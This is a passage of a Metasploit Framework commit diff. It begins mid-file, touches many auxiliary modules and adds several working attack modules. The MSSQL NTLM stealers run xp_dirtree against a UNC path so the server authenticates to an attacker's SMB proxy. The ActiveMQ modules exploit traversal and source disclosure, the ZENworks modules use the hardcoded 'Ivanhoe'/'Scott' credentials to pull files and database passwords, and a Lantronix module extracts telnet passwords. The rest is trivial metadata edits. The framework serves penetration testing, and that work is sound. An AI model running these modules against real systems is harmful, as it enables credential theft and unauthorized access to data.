"xp_dirtree" or "xp_fileexist" stored procedure. The stored procedures will then
force the service account to authenticate to the system defined in the SMBProxy
option. In order for the attack to be successful, the SMB capture or relay module
must be running on the system defined as the SMBProxy. The database account used
to connect to the database should only require the "PUBLIC" role to execute.
Successful execution of this attack usually results in local administrative access
to the Windows system. Specifically, this works great for relaying credentials
between two SQL Servers using a shared service account to get shells. However, if
the relay fails, then the LM hash can be reversed using the Halflm rainbow tables
and john the ripper. Thanks to "Sh2kerr" who wrote the ora_ntlm_stealer for the
inspiration.
},
'Author' => [ 'nullbind <scott.sutherland[at]netspi.com>' ],
'License' => MSF_LICENSE,
'References' => [[ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ]]
))
register_options(
[
OptString.new('SMBPROXY', [ true, 'IP of SMB proxy or sniffer.', '0.0.0.0']),
], self.class)
end
def run_host(ip)
# Reminder
print_status("DONT FORGET to run a SMB capture or relay module!")
# Call auth_force method to execute "xp_dirtree"
begin
force_auth("xp_dirtree",datastore['SMBPROXY'])
return
rescue
print_error("xp_dirtree failed to initiate authentication to smbproxy.")
end
# Call auth_force method to execute "xp_fileexist" if "xp_dirtree" fails
begin
force_auth("xp_fileexist",datastore['SMBPROXY'])
return
rescue
print_error("xp_fileexist failed to initiate authentication to smbproxy.")
end
end
# Method to force sql server to authenticate
def force_auth(sprocedure,smbproxy)
print_status("Forcing SQL Server at #{rhost} to auth to #{smbproxy} via #{sprocedure}...")
# Generate random file name
rand_filename = Rex::Text.rand_text_alpha(8, bad='')
# Setup query
sql = "#{sprocedure} '\\\\#{smbproxy}\\#{rand_filename}'"
result = mssql_query(sql, false) if mssql_login_datastore
column_data = result[:rows]
print_good("Successfully executed #{sprocedure} on #{rhost}")
print_good("Go check your SMB relay or capture module for goodies!")
end
end

60
modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb Normal file
View File

@ -0,0 +1,60 @@
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL_SQLI
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SQL Server NTLM Stealer - SQLi',
'Description' => %q{
This module can be used to help capture or relay the LM/NTLM credentials of the
account running the remote SQL Server service. The module will use the SQL
injection from GET_PATH to connect to the target SQL Server instance and execute
the native "xp_dirtree" or stored procedure. The stored procedures will then
force the service account to authenticate to the system defined in the SMBProxy
option. In order for the attack to be successful, the SMB capture or relay module
must be running on the system defined as the SMBProxy. The database account used to
connect to the database should only require the "PUBLIC" role to execute.
Successful execution of this attack usually results in local administrative access
to the Windows system. Specifically, this works great for relaying credentials
between two SQL Servers using a shared service account to get shells. However, if
the relay fails, then the LM hash can be reversed using the Halflm rainbow tables
and john the ripper.
},
'Author' =>
[
'nullbind <scott.sutherland[at]netspi.com>',
'Antti <antti.rantasaari[at]netspi.com>'
],
'License' => MSF_LICENSE,
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'References' => [[ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ]]
))
register_options(
[
OptString.new('SMBPROXY', [ true, 'IP of SMB proxy or sniffer.', '0.0.0.0']),
], self.class)
end
def run
# Reminder
print_status("DONT FORGET to run a SMB capture or relay module!")
# Generate random file name
rand_filename = Rex::Text.rand_text_alpha(8, bad='')
# Setup query - double escaping backslashes
sql = "exec master..xp_dirtree '\\\\\\\\#{datastore['SMBPROXY']}\\#{rand_filename}'"
print_status("Attempting to force backend DB to authenticate to the #{datastore['SMBPROXY']}")
# Execute query to force authentation from backend database to smbproxy
mssql_query(sql)
end
end

1
modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb
View File

@ -45,7 +45,6 @@ class Metasploit3 < Msf::Auxiliary
['URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-77-1000898.1-1']
],
# Tested OK against sol8.tor 20100624 -jjd
'Privileged' => true,
'DisclosureDate' => 'Jan 22 2003')
register_options(

2
modules/auxiliary/admin/zend/java_bridge.rb
View File

@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'OSVDB', '71420'],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-113/' ],
[ 'EDB', 17078 ],
[ 'EDB', '17078' ],
],
'DisclosureDate' => 'Mar 28 2011'))

2
modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb
View File

@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2010-2156' ],
[ 'OSVDB', '65246'],
[ 'EDB', 14185]
[ 'EDB', '14185']
]
)
register_options(

2
modules/auxiliary/dos/hp/data_protector_rds.rb
View File

@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2011-0514' ],
[ 'OSVDB', '70617' ],
[ 'EDB', 15940 ],
[ 'EDB', '15940' ],
],
'DisclosureDate' => 'Jan 8 2011' ))

2
modules/auxiliary/dos/http/apache_mod_isapi.rb
View File

@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'URL', 'https://issues.apache.org/bugzilla/show_bug.cgi?id=48509' ],
[ 'URL', 'http://www.gossamer-threads.com/lists/apache/cvs/381537' ],
[ 'URL', 'http://www.senseofsecurity.com.au/advisories/SOS-10-002' ],
[ 'EDB', 11650 ]
[ 'EDB', '11650' ]
],
'DisclosureDate' => 'Mar 05 2010'))

2
modules/auxiliary/dos/http/apache_range_dos.rb
View File

@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'BID', '49303'],
[ 'CVE', '2011-3192'],
[ 'EDB', 17696],
[ 'EDB', '17696'],
[ 'OSVDB', '74721' ],
],
'DisclosureDate' => 'Aug 19 2011'))

1
modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb
View File

@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary
Code execution may be possible however this module is only a DoS.
},
'Author' => [ 'patrick' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>

3
modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb
View File

@ -40,10 +40,9 @@ class Metasploit3 < Msf::Auxiliary
[ 'OSVDB', '70167' ],
[ 'BID', '45542' ],
[ 'MSB', 'MS11-004' ],
[ 'EDB', 15803 ],
[ 'EDB', '15803' ],
[ 'URL', 'http://blogs.technet.com/b/srd/archive/2010/12/22/assessing-an-iis-ftp-7-5-unauthenticated-denial-of-service-vulnerability.aspx' ]
],
'Platform' => [ 'win' ],
'DisclosureDate' => 'Dec 21 2010'))
register_options(

2
modules/auxiliary/dos/windows/ftp/solarftp_user.rb
View File

@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
'Version' => '$Revision$',
'References' =>
[
[ 'EDB', 16204 ],
[ 'EDB', '16204' ],
],
'DisclosureDate' => 'Feb 22 2011'))

2
modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb
View File

@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2010-1899' ],
[ 'OSVDB', '67978'],
[ 'MSB', 'MS10-065'],
[ 'EDB', 15167 ]
[ 'EDB', '15167' ]
],
'DisclosureDate' => 'Sep 14 2010'))

2
modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb
View File

@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'URL', 'http://pastie.org/private/4egcqt9nucxnsiksudy5dw' ],
[ 'URL', 'http://pastie.org/private/feg8du0e9kfagng4rrg' ],
[ 'URL', 'http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html' ],
[ 'EDB', 18606 ],
[ 'EDB', '18606' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/03/21/metasploit-update' ]
],
'Author' =>

2
modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb
View File

@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'BID', '46360' ],
[ 'OSVDB', '70881' ],
[ 'MSB', 'MS11-019' ],
[ 'EDB', 16166 ],
[ 'EDB', '16166' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2011/Feb/285' ]
],
'Author' => [ 'Cupidon-3005', 'jduck' ],

2
modules/auxiliary/dos/windows/tftp/solarwinds.rb
View File

@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2010-2115' ],
[ 'OSVDB', '64845' ],
[ 'EDB', 12683 ]
[ 'EDB', '12683' ]
],
'DisclosureDate' => 'May 21 2010'))

2
modules/auxiliary/gather/d20pass.rb
View File

@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'K. Reid Wightman <wightman[at]digitalbond.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 1 $',
'Version' => '$Revision$',
'DisclosureDate' => 'Jan 19 2012'
))

2
modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb
View File

@ -13,7 +13,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'IPv6 Link Local/Node Local Ping Discovery',
'Version' => '$Revision: 13962 $',
'Version' => '$Revision$',
'Description' => %q{
Send a ICMPv6 ping request to all default multicast addresses, and wait to see who responds.
},

2
modules/auxiliary/scanner/h323/h323_version.rb
View File

@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'H.323 Version Scanner',
'Version' => '$Revision: 9804 $',
'Version' => '$Revision$',
'Description' => 'Detect H.323 Version.',
'Author' => 'hdm',
'License' => MSF_LICENSE

71
modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb Normal file
View File

@ -0,0 +1,71 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache ActiveMQ JSP files Source Disclosure',
'Description' => %q{
This module exploits a source code disclosure in Apache ActiveMQ. The
vulnerability is due to the Jetty's ResourceHandler handling of specially crafted
URI's starting with //. It has been tested successfully on Apache ActiveMQ 5.3.1
over Windows 2003 SP2 and Ubuntu 10.04.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Veerendra G.G', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2010-1587' ],
[ 'OSVDB', '64020' ],
[ 'BID', '39636' ],
[ 'URL', 'https://issues.apache.org/jira/browse/AMQ-2700' ]
]
))
register_options(
[
Opt::RPORT(8161),
OptString.new('TARGETURI', [true, 'Path to the JSP file to disclose source code', '/admin/index.jsp'])
], self.class)
end
def run_host(ip)
print_status("#{rhost}:#{rport} - Sending request...")
res = send_request_cgi({
'uri' => "/#{target_uri.to_s}",
'method' => 'GET',
})
if res and res.code == 200
contents = res.body
fname = File.basename(datastore['TARGETURI'])
path = store_loot(
'apache.activemq',
'text/plain',
ip,
contents,
fname
)
print_status("#{rhost}:#{rport} - File saved in: #{path}")
else
print_error("#{rhost}:#{rport} - Failed to retrieve file")
return
end
end
end

80
modules/auxiliary/scanner/http/apache_activemq_traversal.rb Normal file
View File

@ -0,0 +1,80 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache ActiveMQ Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability in Apache ActiveMQ
5.3.1 and 5.3.2 on Windows systems. The vulnerability exists in the Jetty's
ResourceHandler installed with the affected versions. This module has been tested
successfully on ActiveMQ 5.3.1 and 5.3.2 over Windows 2003 SP2.
},
'License' => MSF_LICENSE,
'Author' =>
[
'AbdulAziz Hariri', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'OSVDB', '86401' ],
[ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=895' ],
[ 'URL', 'https://issues.apache.org/jira/browse/amq-2788' ]
]
))
register_options(
[
Opt::RPORT(8161),
OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
OptInt.new('DEPTH', [false, 'Traversal depth if absolute is set to false', 4])
], self.class)
end
def run_host(ip)
# No point to continue if no filename is specified
if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
print_error("#{rhost}:#{rport} - Please supply FILEPATH")
return
end
travs = "/\\.." * (datastore['DEPTH'] || 1)
travs << "/" unless datastore['FILEPATH'][0] == "\\" or datastore['FILEPATH'][0] == "/"
travs << datastore['FILEPATH']
print_status("#{rhost}:#{rport} - Sending request...")
res = send_request_cgi({
'uri' => travs,
'method' => 'GET',
})
if res and res.code == 200
contents = res.body
fname = File.basename(datastore['FILEPATH'])
path = store_loot(
'apache.activemq',
'application/octet-stream',
ip,
contents,
fname
)
print_status("#{rhost}:#{rport} - File saved in: #{path}")
else
print_error("#{rhost}:#{rport} - Failed to retrieve file")
return
end
end
end

2
modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb
View File

@ -16,7 +16,7 @@ class Metasploit4 < Msf::Auxiliary
def initialize
super(
'Name' => 'Atlassian Crowd XML Entity Expansion Remote File Access',
'Version' => '$Revision: $',
'Version' => '$Revision$',
'Description' => %q{
This module simply attempts to read a remote file from the server using a
vulnerability in the way Atlassian Crowd handles XML files. The vulnerability

2
modules/auxiliary/scanner/http/axis_local_file_include.rb
View File

@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary
},
'References' =>
[
['EDB', 12721],
['EDB', '12721'],
['OSVDB', '59001'],
],
'Author' =>

2
modules/auxiliary/scanner/http/barracuda_directory_traversal.rb
View File

@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
[
['OSVDB', '68301'],
['URL', 'http://secunia.com/advisories/41609/'],
['EDB', 15130]
['EDB', '15130']
],
'Author' =>
[

112
modules/auxiliary/scanner/http/enum_delicious.rb
View File

@ -1,112 +0,0 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'net/http'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Del.icio.us Domain Links (URLs) Enumerator',
'Description' => %q{
This module pulls and parses the URLs stored by Del.icio.us users for the
purpose of replaying during a web assessment. Finding unlinked and old pages.
},
'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'))
register_options(
[
OptString.new('DOMAIN', [ true, "Domain to request URLS for"]),
OptString.new('OUTFILE', [ false, "Where to output the list for use"])
], self.class)
register_advanced_options(
[
OptString.new('PROXY', [ false, "Proxy server to route connection. <host>:<port>",nil]),
OptString.new('PROXY_USER', [ false, "Proxy Server User",nil]),
OptString.new('PROXY_PASS', [ false, "Proxy Server Password",nil])
], self.class)
end
def pull_urls(targetdom)
response = ""
list = []
lastpage = 0
pagenum = 1
while lastpage == 0
print_status("Page number: " + pagenum.to_s)
header = { 'User-Agent' => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/525.13"}
clnt = Net::HTTP::Proxy(@proxysrv,@proxyport,@proxyuser,@proxypass).new("www.delicious.com")
resp = clnt.get2("/search?p=site%3A"+targetdom+"&page="+pagenum.to_s,header)
response << resp.body
response.each_line do |line|
list << line.gsub!(/(.+<a rel=\"nofollow)(.+=+\")(.+)(\".+)/, '\3')
end
if /pn\ next/.match(data)
pagenum += 1
else
lastpage = 1
end
end
list.delete_if{|x| x==nil}
list.uniq!
list.sort!
return list
end
def write_output(data)
print_status("Writing URLs list to #{datastore['OUTFILE']}...")
file_name = datastore['OUTFILE']
if FileTest::exist?(file_name)
print_status("OUTFILE already existed, appending..")
else
print_status("OUTFILE did not exist, creating..")
end
File.open(file_name, 'ab') do |fd|
fd.write(data)
end
end
def run
if datastore['PROXY']
@proxysrv,@proxyport = datastore['PROXY'].split(":")
@proxyuser = datastore['PROXY_USER']
@proxypass = datastore['PROXY_PASS']
else
@proxysrv,@proxyport = nil, nil
end
target = datastore['DOMAIN']
urls = []
print_status("Pulling urls from Delicious.com")
urls = pull_urls(target)
print_status("Located #{urls.count} addresses for #{target}")
if datastore['OUTFILE']
write_output(urls.join)
else
urls.each do |i|
print_status(i)
end
end
end
end

2
modules/auxiliary/scanner/http/enum_wayback.rb
View File

@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
This module pulls and parses the URLs stored by Archive.org for the purpose of
replaying during a web assessment. Finding unlinked and old pages.
},
'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ],
'Author' => [ 'mubix' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
))

2
modules/auxiliary/scanner/http/httpbl_lookup.rb
View File

@ -23,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
This module can be used to enumerate information
about an IP addresses from Project HoneyPot's HTTP Block List.
},
'Author' => [ 'Rob Fuller <mubix[at]rapid7.com>' ],
'Author' => [ 'mubix' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>

2
modules/auxiliary/scanner/http/litespeed_source_disclosure.rb
View File

@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2010-2333' ],
[ 'OSVDB', '65476' ],
[ 'BID', '40815' ],
[ 'EDB', 13850 ]
[ 'EDB', '13850' ]
],
'Author' =>
[

2
modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb
View File

@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
['CVE', '2011-0063'],
['URL', 'https://sitewat.ch/en/Advisory/View/1'],
['URL', 'http://sotiriu.de/adv/NSOADV-2011-003.txt'],
['EDB', 16103]
['EDB', '16103']
],
'DisclosureDate' => 'Mar 08 2011',
'License' => MSF_LICENSE

4
modules/auxiliary/scanner/http/nginx_source_disclosure.rb
View File

@ -31,8 +31,8 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2010-2263' ],
[ 'OSVDB', '65531' ],
[ 'BID', '40760' ],
[ 'EDB', 13818 ],
[ 'EDB', 13822 ]
[ 'EDB', '13818' ],
[ 'EDB', '13822' ]
],
'Author' =>
[

97
modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb Normal file
View File

@ -0,0 +1,97 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell ZENworks Asset Management 7.5 Remote File Access',
'Description' => %q{
This module exploits a hardcoded user and password for the GetFile maintenance
task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web
Console and can be triggered by sending a specially crafted request to the rtrlet component,
allowing a remote unauthenticated user to retrieve a maximum of 100_000_000 KB of
remote files. This module has been successfully tested on Novell ZENworks Asset
Management 7.5.
},
'License' => MSF_LICENSE,
'Author' =>
[
'juan vazquez' # Also the discoverer
],
'References' =>
[
[ 'CVE', '2012-4933' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks' ] ]
))
register_options(
[
Opt::RPORT(8080),
OptBool.new('ABSOLUTE', [ true, 'Use an absolute file path or directory traversal relative to the tomcat home', true ]),
OptString.new('FILEPATH', [true, 'The name of the file to download', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts']),
OptInt.new('DEPTH', [false, 'Traversal depth if absolute is set to false', 1])
], self.class)
end
def run_host(ip)
# No point to continue if no filename is specified
if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
print_error("Please supply the name of the file you want to download")
return
end
post_data = "kb=100000000&"
if datastore['ABSOLUTE']
post_data << "file=#{datastore['FILEPATH']}&"
post_data << "absolute=yes&"
else
travs = "../" * (datastore['DEPTH'] || 1)
travs << "/" unless datastore['FILEPATH'][0] == "\\" or datastore['FILEPATH'][0] == "/"
travs << datastore['FILEPATH']
post_data << "file=#{travs}&"
post_data << "absolute=no&"
end
post_data << "maintenance=GetFile_password&username=Ivanhoe&password=Scott&send=Submit"
print_status("#{rhost}:#{rport} - Sending request...")
res = send_request_cgi({
'uri' => '/rtrlet/rtr',
'method' => 'POST',
'data' => post_data,
}, 5)
if res and res.code == 200 and res.body =~ /Last 100000000 kilobytes of/ and res.body =~ /File name/ and not res.body =~ /<br\/>File not found.<br\/>/
print_good("#{rhost}:#{rport} - File retrieved successfully!")
start_contents = res.body.index("<pre>") + 7
end_contents = res.body.rindex("</pre>") - 1
if start_contents.nil? or end_contents.nil?
print_error("#{rhost}:#{rport} - Error reading file contents")
return
end
contents = res.body[start_contents..end_contents]
fname = File.basename(datastore['FILEPATH'])
path = store_loot(
'novell.zenworks_asset_management',
'application/octet-stream',
ip,
contents,
fname
)
print_status("#{rhost}:#{rport} - File saved in: #{path}")
else
print_error("#{rhost}:#{rport} - Failed to retrieve file")
return
end
end
end

74
modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb Normal file
View File

@ -0,0 +1,74 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell ZENworks Asset Management 7.5 Configuration Access',
'Description' => %q{
This module exploits a hardcoded user and password for the GetConfig maintenance
task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web
Console and can be triggered by sending a specially crafted request to the rtrlet component,
allowing a remote unauthenticated user to retrieve the configuration parameters of
Nozvell Zenworks Asset Managmment, including the database credentials in clear text.
This module has been successfully tested on Novell ZENworks Asset Management 7.5.
},
'License' => MSF_LICENSE,
'Author' =>
[
'juan vazquez' # Also the discoverer
],
'References' =>
[
[ 'CVE', '2012-4933' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks' ]
]
))
register_options(
[
Opt::RPORT(8080),
], self.class)
end
def run_host(ip)
post_data = "kb=&file=&absolute=&maintenance=GetConfigInfo_password&username=Ivanhoe&password=Scott&send=Submit"
print_status("#{rhost}:#{rport} - Sending request...")
res = send_request_cgi({
'uri' => '/rtrlet/rtr',
'method' => 'POST',
'data' => post_data,
}, 5)
if res and res.code == 200 and res.body =~ /<b>Rtrlet Servlet Configuration Parameters \(live\)<\/b><br\/>/
print_good("#{rhost}:#{rport} - File retrieved successfully!")
path = store_loot(
'novell.zenworks_asset_management.config',
'text/html',
ip,
res.body,
nil,
"Novell ZENworks Asset Management Configuration"
)
print_status("#{rhost}:#{rport} - File saved in: #{path}")
else
print_error("#{rhost}:#{rport} - Failed to retrieve configuration")
return
end
end
end

9
modules/auxiliary/scanner/smb/smb_login.rb
View File

@ -101,7 +101,8 @@ class Metasploit3 < Msf::Auxiliary
begin
smb_login()
rescue ::Rex::Proto::SMB::Exceptions::LoginError => e
rescue ::Rex::Proto::SMB::Exceptions::LoginError
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode
end
begin
@ -135,7 +136,8 @@ class Metasploit3 < Msf::Auxiliary
begin
smb_login()
rescue ::Rex::Proto::SMB::Exceptions::LoginError => e
rescue ::Rex::Proto::SMB::Exceptions::LoginError
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode
end
disconnect()
@ -154,7 +156,8 @@ class Metasploit3 < Msf::Auxiliary
connect()
begin
smb_login()
rescue ::Rex::Proto::SMB::Exceptions::LoginError => e
rescue ::Rex::Proto::SMB::Exceptions::LoginError
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode
end
disconnect()
datastore['SMBDomain'] = orig_domain

94
modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb Normal file
View File

@ -0,0 +1,94 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Lantronix Telnet Password Recovery',
'Description' => %q{
This module retrieves the setup record from Lantronix serial-to-ethernet
devices via the config port (30718/udp, enabled by default) and extracts the
telnet password. It has been tested successfully on a Lantronix Device Server
with software version V5.8.0.1.
},
'Author' => 'jgor',
'License' => MSF_LICENSE
)
register_options(
[
Opt::CHOST,
Opt::RPORT(30718)
], self.class)
end
def run_host(ip)
setup_probe = "\x00\x00\x00\xF8"
password = nil
begin
# Create an unbound UDP socket if no CHOST is specified, otherwise
# create a UDP socket bound to CHOST (in order to avail of pivoting)
udp_sock = Rex::Socket::Udp.create( {
'LocalHost' => datastore['CHOST'] || nil,
'PeerHost' => ip,
'PeerPort' => datastore['RPORT'],
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self
}
})
udp_sock.put(setup_probe)
res = udp_sock.recvfrom(65535, 0.5) and res[1]
if res
password = parse_reply(res)
end
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused, ::IOError
print_error("Connection error")
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("Unknown error: #{e.class} #{e}")
ensure
udp_sock.close if udp_sock
end
if password
print_good("#{rhost} - Telnet password found: #{password.to_s}")
report_auth_info({
:host => rhost,
:port => 9999,
:sname => 'telnet',
:duplicate_ok => false,
:pass => password,
})
end
end
def parse_reply(pkt)
setup_record = pkt[0]
# If response is a setup record, extract password bytes 13-16
if setup_record[3].ord == 0xF9
return setup_record[12,4]
else
return nil
end
end
end

2
modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb
View File

@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
[
['BID', '51182'],
['CVE', '2011-4862'],
['EDB', 18280],
['EDB', '18280'],
['URL', 'https://community.rapid7.com/community/metasploit/blog/2011/12/28/more-fun-with-bsd-derived-telnet-daemons']
]
)

2
modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb
View File

@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
[
['OSVDB', '77455'],
['BID', '50890'],
['EDB', 18189],
['EDB', '18189'],
['URL', 'http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt']
],
'DisclosureDate' => "Dec 12 2011"

64
modules/auxiliary/scanner/winrm/winrm_auth_methods.rb Normal file
View File

@ -0,0 +1,64 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex/proto/ntlm/message'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::WinRM
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'WinRM Authentication Method Detection',
'Version' => '$Revision$',
'Description' => %q{
This module sends a request to an HTTP/HTTPS service to see if it is a WinRM service.
If it is a WinRM service, it also gathers the Authentication Methods supported.
},
'Author' => [ 'thelightcosine' ],
'License' => MSF_LICENSE
)
deregister_options('USERNAME', 'PASSWORD')
end
def run_host(ip)
resp = winrm_poke
return nil if resp.nil?
if resp.code == 401 and resp.headers['Server'].include? "Microsoft-HTTPAPI"
methods = parse_auth_methods(resp)
desc = resp.headers['Server'] + " Authentication Methods: " + methods.to_s
report_service(
:host => ip,
:port => rport,
:proto => 'tcp',
:name => 'winrm',
:info => desc
)
print_good "Negotiate protocol supported" if methods.include? "Negotiate"
print_good "Kerberos protocol supported" if methods.include? "Kerberos"
print_good "Basic protocol supported" if methods.include? "Basic"
else
print_error "#{ip}:#{rport} Does not appear to be a WinRM server"
end
end
end

2
modules/auxiliary/server/capture/drda.rb
View File

@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'Authentication Capture: DRDA (DB2, Informix, Derby)',
'Version' => '$Revision: 14774 $',
'Version' => '$Revision$',
'Description' => %q{
This module provides a fake DRDA (DB2, Informix, Derby) server
that is designed to capture authentication credentials.

4
modules/auxiliary/server/capture/http_javascript_keylogger.rb
View File

@ -182,8 +182,8 @@ class Metasploit3 < Msf::Auxiliary
print_good("[#{cid}] Logging raw keystrokes to: #{@client_cache[cid][:path_raw]}")
end
::File.open( @client_cache[cid][:path_clean], "a") { |fd| fd.puts nice }
::File.open( @client_cache[cid][:path_raw], "a") { |fd| fd.write(real) }
::File.open( @client_cache[cid][:path_clean], "ab") { |fd| fd.puts nice }
::File.open( @client_cache[cid][:path_raw], "ab") { |fd| fd.write(real) }
if nice.length > 0
print_good("[#{cid}] Keys: #{nice}")

4
modules/auxiliary/server/capture/http_ntlm.rb
View File

@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
def on_request_uri(cli, request)
